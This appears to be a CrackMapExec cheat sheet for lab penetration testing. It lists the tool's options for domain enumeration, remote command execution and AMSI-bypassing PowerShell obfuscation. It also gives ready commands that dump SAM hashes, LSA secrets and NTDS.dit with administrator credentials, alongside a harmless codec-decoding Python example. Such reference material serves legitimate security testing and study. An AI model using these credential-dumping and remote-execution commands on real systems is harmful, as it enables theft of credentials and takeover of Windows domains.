Mapping/Enumeration
Options for Mapping/Enumerating
  --shares                        enumerate shares and access
  --sessions                      enumerate active sessions
  --disks                         enumerate disks
  --loggedon-users-filter LOGGEDON_USERS_FILTER
                                  only search for a specific user, works with regex
  --loggedon-users                enumerate logged on users
  --users [USER]                  enumerate domain users; if a user is specified then only its information is queried
  --groups [GROUP]                enumerate domain groups; if a group is specified then its members are enumerated
  --computers [COMPUTER]          enumerate computer users
  --local-groups [GROUP]          enumerate local groups; if a group is specified then its members are enumerated
  --pass-pol                      dump password policy
  --rid-brute [MAX_RID]           enumerate users by brute-forcing RIDs (default: 4000)
  --wmi QUERY                     issues the specified WMI query
  --wmi-namespace NAMESPACE       WMI namespace (default: root\cimv2)
Credential Gathering
Options for gathering credentials
  --enabled                       only dump enabled targets from DC
  --user USERNTDS                 dump selected user from DC
  --sam                           dump SAM hashes from target systems
  --lsa                           dump LSA secrets from target systems
  --ntds [{drsuapi,vss}]          dump the NTDS.dit from target DCs using the specified method (default: drsuapi)
Dumping SAM database
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --sam
Dumping LSA Database
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --lsa
Dumping NTDS – DRSUAPI
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds drsuapi
Dumping NTDS – VSS
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds vss
Spidering
Options for spidering shares
  --spider SHARE                  share to spider
  --spider-folder FOLDER          folder to spider (default: root share directory)
  --content                       enable file content searching
  --exclude-dirs DIR_LIST         directories to exclude from spidering
  --pattern PATTERN [PATTERN ...] pattern(s) to search for in folders, filenames and file content
  --regex REGEX [REGEX ...]       regex(s) to search for in folders, filenames and file content
  --depth DEPTH                   max spider recursion depth (default: infinity & beyond)
  --only-files                    only spider files
Hacking Authentication
brute force passwords
Password Spraying
Managing Files
Options for put and get remote files
  --put-file FILE FILE            put a local file onto the remote target, ex: whoami.txt \\Windows\\Temp\\whoami.txt
  --get-file FILE FILE            get a remote file, ex: \\Windows\\Temp\\whoami.txt whoami.txt
Remote Command Execution
Command Execution:
Options for executing commands
  --exec-method {wmiexec,smbexec,atexec,mmcexec}
                                  method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
  --codec CODEC                   set the encoding (codec) used to decode the target's output (default "utf-8"). If errors are detected, run chcp.com on the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec
  --force-ps32                    force the PowerShell command to run in a 32-bit process
  --no-output                     do not retrieve command output
  -x COMMAND                      execute the specified command
  -X PS_COMMAND                   execute the specified PowerShell command
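The chcp-to-codec mapping that the --codec option asks for, as an added example (this is not CrackMapExec code): it takes the number from chcp.com's output, whose label is localized on non-English Windows (the sample lines here are constructed), confirms that Python knows the resulting cpNNNN codec, and decodes a constructed cp850 byte string the way the target's output would be decoded.

```python
import codecs
import re

# Constructed samples of what chcp.com prints on a target. The label differs
# per Windows language, so only the trailing code page number is relied on.
SAMPLE_CHCP_OUTPUT_EN = "Active code page: 850\n"
SAMPLE_CHCP_OUTPUT_DE = "Aktive Codepage: 1252.\n"

# Constructed raw bytes as a target on OEM code page 850 would emit them:
# the word "Größe" encoded with cp850 (ö = 0x94, ß = 0xE1).
SAMPLE_CP850_BYTES = b"Gr\x94\xe1e"


def codec_from_chcp(chcp_output: str) -> str:
    """Turn chcp.com output into the Python codec name to pass to --codec.

    chcp reports the OEM code page number; Python names that codec
    'cp<number>'. codecs.lookup() raises LookupError for a name Python
    does not know, so an unsupported code page fails here, not later.
    """
    match = re.search(r"(\d+)\s*\.?\s*$", chcp_output.strip())
    if not match:
        raise ValueError(f"no code page number found in: {chcp_output!r}")
    return codecs.lookup(f"cp{match.group(1)}").name  # normalized, e.g. 'cp850'


def decode_output(raw: bytes, codec: str) -> str:
    """Decode command output with the chosen codec.

    errors='strict' makes a wrong codec raise UnicodeDecodeError instead
    of silently inserting replacement characters, which is exactly the
    symptom that prompts the --codec adjustment.
    """
    return raw.decode(codec, errors="strict")


if __name__ == "__main__":
    codec = codec_from_chcp(SAMPLE_CHCP_OUTPUT_EN)
    print(codec, "->", decode_output(SAMPLE_CP850_BYTES, codec))
```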
PowerShell Obfuscation
Options for PowerShell script obfuscation
  --obfs                          obfuscate PowerShell scripts
  --amsi-bypass FILE              file with a custom AMSI bypass
  --clear-obfscripts              clear all cached obfuscated PowerShell scripts
Reverse Shells
CrackMapExec Samba Modules
crackmapexec smb -L